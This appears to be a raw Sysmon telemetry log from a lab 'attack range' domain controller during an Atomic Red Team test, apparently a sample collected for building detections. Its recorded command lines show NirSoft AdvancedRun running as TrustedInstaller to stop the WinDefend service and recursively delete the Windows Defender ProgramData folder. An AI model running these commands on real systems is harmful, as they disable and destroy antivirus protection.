17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003979792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.840{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979789Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.840{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.840{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 
(rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.840{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.825{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.825{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 
10341000x80000000000000003979782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.825{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003979781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.825{834264DD-F418-61EA-6704-000000002702}43763796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648
a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003979780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:44.825{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F418-61EA-6704-000000002702}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003979779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.809{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:44.809{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003979777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.809{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003979776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:44.809{834264DD-F418-61EA-6704-000000002702}43763796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a
459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003979775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.815{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 
/RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F418-61EA-6704-000000002702}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003979524Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.550{834264DD-F418-61EA-6704-000000002702}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003979166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:39.198{834264DD-F413-61EA-6404-000000002702}520C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000003979160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:39.090{834264DD-F411-61EA-6304-000000002702}2204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe2022-01-21 17:57:39.090ATTACKRANGE\Administrator 154100x80000000000000003978049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:37.403{834264DD-F411-61EA-6204-000000002702}5200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® 
Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 23542300x80000000000000003974622Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:55:56.236{834264DD-F3A7-61EA-4E04-000000002702}5124ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8truetrue 154100x80000000000000003971301Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:55:28.499{834264DD-F390-61EA-4904-000000002702}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
ATTACKRANGE\Administrator 11241100x80000000000000003971295Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:55:28.394{834264DD-F38F-61EA-4804-000000002702}2732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe2022-01-21 17:55:28.394ATTACKRANGE\Administrator 154100x80000000000000003970409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:55:26.957{834264DD-F38E-61EA-4704-000000002702}520C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003967509Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003967507Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.332{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967506Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967505Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2104-000000002702}108C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun